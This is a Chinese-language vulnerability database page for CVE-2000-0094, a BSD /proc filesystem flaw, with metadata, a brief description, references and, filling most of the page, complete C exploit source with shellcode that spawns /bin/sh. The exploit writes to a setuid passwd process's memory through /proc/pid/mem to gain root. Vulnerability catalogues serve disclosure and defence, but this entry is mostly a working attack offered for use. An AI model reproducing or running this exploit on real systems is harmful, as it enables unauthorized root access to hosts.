多个供应商BSD /proc文件系统漏洞

多个供应商BSD /proc文件系统漏洞

漏洞ID 1105691 漏洞类型 其他
发布时间 2000-01-21 更新时间 2005-05-02
图片[1]-多个供应商BSD /proc文件系统漏洞-安全小百科CVE编号 CVE-2000-0094
图片[2]-多个供应商BSD /proc文件系统漏洞-安全小百科CNNVD-ID CNNVD-200002-051
漏洞平台 BSD CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19726
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-051
|漏洞详情
BSD系统中的procfs存在漏洞。本地用户借助修改的标准错误的文件描述符,通过修改/proc/pid/mem接口提升根特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/940/info

Certain BSD derivative operating systems use an implantation of the /proc filesystem which is vulnerable to attack from malicious local users. This attack will gain the user root access to the host.

The proc file system was originally designed to allow easy access to information about processes (hence the name). Its typical benefit is quicker access to memory hence more streamlined operations. As noted previously
certain implementations have a serious vulnerability. In short, the vulnerability is that users may manipulate processes under system which use /proc to gain root privileges. The full details are covered at length in the advisory attached to the 'Credit' section of this vulnerability entry.

/* by Nergal */
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <signal.h>
#include <sys/wait.h>

char            shellcode[] =
"xebx0ax62x79x20x4ex65x72x67x61x6cx20" 
"xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f"
"x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52"
"x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01"
"x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04x00";

#define PASSWD "./passwd"
void 
sg(int x)
{
}
int
main(int argc, char **argv)
{
	unsigned int stack, shaddr;
	int             pid,schild;
	int             fd;
	char            buff[40];
	unsigned int    status;
	char            *ptr;
	char            name[4096];
	char 		sc[4096];
	char            signature[] = "signature";

	signal(SIGUSR1, sg);
if (symlink("usr/bin/passwd",PASSWD) && errno!=EEXIST)
{
perror("creating symlink:");
exit(1);
}
	shaddr=(unsigned int)&shaddr;
	stack=shaddr-2048;
	if (argc>1)
	shaddr+=atoi(argv[1]);
	if (argc>2)
	stack+=atoi(argv[2]);
	fprintf(stderr,"shellcode addr=0x%x stack=0x%xn",shaddr,stack);
	fprintf(stderr,"Wait for "Press return" prompt:n");
	memset(sc, 0x90, sizeof(sc));
	strncpy(sc+sizeof(sc)-strlen(shellcode)-1, shellcode,strlen(shellcode));
	strncpy(sc,"EGG=",4);
memset(name,'x',sizeof(name));
	for (ptr = name; ptr < name + sizeof(name); ptr += 4)
		*(unsigned int *) ptr = shaddr;
	name[sizeof(name) - 1] = 0;

	pid = fork();
	switch (pid) {
	case -1:
		perror("fork");
		exit(1);
	case 0:
		pid = getppid();
		sprintf(buff, "/proc/%d/mem", pid);
		fd = open(buff, O_RDWR);
		if (fd < 0) {
			perror("open procmem");
			wait(NULL);
			exit(1);
		}
		/* wait for child to execute suid program */
		kill(pid, SIGUSR1);
		do {
			lseek(fd, (unsigned int) signature, SEEK_SET);
		} while
			(read(fd, buff, sizeof(signature)) == sizeof(signature) &&
			 !strncmp(buff, signature, sizeof(signature)));
		lseek(fd, stack, SEEK_SET);
		switch (schild = fork()) {
		case -1:
			perror("fork2");
			exit(1);
		case 0:

			dup2(fd, 2);
			sleep(2);
			execl(PASSWD, name, "blahblah", 0);
			printf("execl failedn");
			exit(1);
		default:
			waitpid(schild, &status, 0);
		}
		fprintf(stderr, "nPress return.n");
		exit(1);
	default:
		/* give parent time to open /proc/pid/mem */
		pause();
		putenv(sc);
		execl(PASSWD, "passwd", NULL);
		perror("execl");
		exit(0);

	}
}
|参考资料

来源:XF
名称:netbsd-procfs(3995)
链接:http://xforce.iss.net/xforce/xfdb/3995
来源:BID
名称:940
链接:http://www.securityfocus.com/bid/940
来源:OSVDB
名称:20760
链接:http://www.osvdb.org/20760
来源:NETBSD
名称:NetBSD-SA2000-001
链接:ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2000-001.txt.asc

相关推荐: My Photo Gallery Unspecified Vulnerability

My Photo Gallery Unspecified Vulnerability 漏洞ID 1103037 漏洞类型 Unknown 发布时间 2001-08-10 更新时间 2001-08-10 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享